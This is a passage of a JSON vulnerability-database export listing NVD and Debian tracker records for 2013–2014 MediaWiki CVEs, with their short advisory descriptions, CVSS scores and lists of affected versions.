"cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:04", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via unspecified CSS values.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-28T15:15:00", "type": "cve", "title": "CVE-2013-6451", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-30T18:32:00", "cpe": [], "id": "CVE-2013-6451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T12:24:33", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php; (2) the w parameter (aka width field) to thumb.php, which is not properly handled by includes/media/PdfHandler_body.php; and possibly unspecified vectors in (3) includes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "cvss3": {}, "published": "2014-01-30T23:55:00", "type": "cve", "title": "CVE-2014-1610", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2016-05-25T15:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", 
"cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.4"], "id": "CVE-2014-1610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:47", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php in MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers to inject arbitrary web script or HTML via the sort key in an info action.", "cvss3": {}, "published": "2014-04-29T18:55:00", "type": "cve", "title": "CVE-2014-2853", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", 
"availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2015-09-10T15:28:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.3.14", "cpe:/a:mediawiki:mediawiki:1.3.13", "cpe:/a:mediawiki:mediawiki:1.20", "cpe:/a:mediawiki:mediawiki:1.6.6", "cpe:/a:mediawiki:mediawiki:1.2.6", "cpe:/a:mediawiki:mediawiki:1.3.15", "cpe:/a:mediawiki:mediawiki:1.5.8", "cpe:/a:mediawiki:mediawiki:1.12.3", "cpe:/a:mediawiki:mediawiki:1.3.7", "cpe:/a:mediawiki:mediawiki:1.13.4", "cpe:/a:mediawiki:mediawiki:1.4.3", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.10.4", "cpe:/a:mediawiki:mediawiki:1.9.0", "cpe:/a:mediawiki:mediawiki:1.6.3", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.13.1", "cpe:/a:mediawiki:mediawiki:1.5.6", "cpe:/a:mediawiki:mediawiki:1.16.0", "cpe:/a:mediawiki:mediawiki:1.18.0", "cpe:/a:mediawiki:mediawiki:1.5.2", "cpe:/a:mediawiki:mediawiki:1.15.2", "cpe:/a:mediawiki:mediawiki:1.2.5", "cpe:/a:mediawiki:mediawiki:1.10.1", "cpe:/a:mediawiki:mediawiki:1.16.1", "cpe:/a:mediawiki:mediawiki:1.2.3", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.10.0", "cpe:/a:mediawiki:mediawiki:1.8.0", "cpe:/a:mediawiki:mediawiki:1.15.5", "cpe:/a:mediawiki:mediawiki:1.6.12", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.7.0", "cpe:/a:mediawiki:mediawiki:1.6.7", "cpe:/a:mediawiki:mediawiki:1.4.0", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.21.4", "cpe:/a:mediawiki:mediawiki:1.3.9", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.5.0", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.4.9", "cpe:/a:mediawiki:mediawiki:1.2.1", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.4.12", 
"cpe:/a:mediawiki:mediawiki:1.6.9", "cpe:/a:mediawiki:mediawiki:1.4.8", "cpe:/a:mediawiki:mediawiki:1.7.2", "cpe:/a:mediawiki:mediawiki:1.8.3", "cpe:/a:mediawiki:mediawiki:1.9.5", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.7.3"], "id": "CVE-2014-2853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta2:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.5:rc3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta4:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:09", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via a -o-link attribute.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6454", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-13T14:21:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", 
"cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.7"], "id": "CVE-2013-6454", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in mediawiki.page.image.pagination.js in MediaWiki 1.22.x before 1.22.9 and 1.23.x before 1.23.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving the 
multipageimagenavbox class in conjunction with an action=raw value.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "debiancve", "title": "CVE-2014-5242", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5242"], "modified": "2014-08-22T17:55:00", "id": "DEBIANCVE:CVE-2014-5242", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "The JSONP endpoint in includes/api/ApiFormatJson.php in MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 accepts certain long callback values and does not restrict the initial bytes of a JSONP response, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks, and obtain sensitive information, via a crafted OBJECT element with SWF content consistent with a restricted character set.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "debiancve", "title": "CVE-2014-5241", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2014-5241"], "modified": "2014-08-22T17:55:00", "id": "DEBIANCVE:CVE-2014-5241", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5241", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does not properly sanitize SVG files, which allows remote attackers to have unspecified impact via invalid XML.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6453", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6453", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via crafted XSL in an SVG file.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6452", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, 
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6452", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to obtain information about deleted page via the (1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "debiancve", "title": "CVE-2013-6472", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-12T14:55:00", "id": "DEBIANCVE:CVE-2013-6472", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 does not enforce an IFRAME protection mechanism for transcluded pages, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "debiancve", "title": "CVE-2014-5243", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5243"], "modified": "2014-08-22T17:55:00", "id": "DEBIANCVE:CVE-2014-5243", "href": "https://security-tracker.debian.org/tracker/CVE-2014-5243", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via unspecified CSS values.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-01-28T15:15:00", "type": "debiancve", "title": "CVE-2013-6451", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": 
"2020-01-28T15:15:00", "id": "DEBIANCVE:CVE-2013-6451", "href": "https://security-tracker.debian.org/tracker/CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-06T06:01:58", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php; (2) the w parameter (aka width field) to thumb.php, which is not properly handled by includes/media/PdfHandler_body.php; and possibly unspecified vectors in (3) includes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "cvss3": {}, "published": "2014-01-30T23:55:00", "type": "debiancve", "title": "CVE-2014-1610", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2014-01-30T23:55:00", "id": "DEBIANCVE:CVE-2014-1610", "href": "https://security-tracker.debian.org/tracker/CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T06:01:58", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php in MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers to inject arbitrary web script or HTML via the sort key in an info action.", "cvss3": {}, "published": "2014-04-29T18:55:00", "type": "debiancve", "title": "CVE-2014-2853", "bulletinFamily": "info", "cvss2": {"severity": 
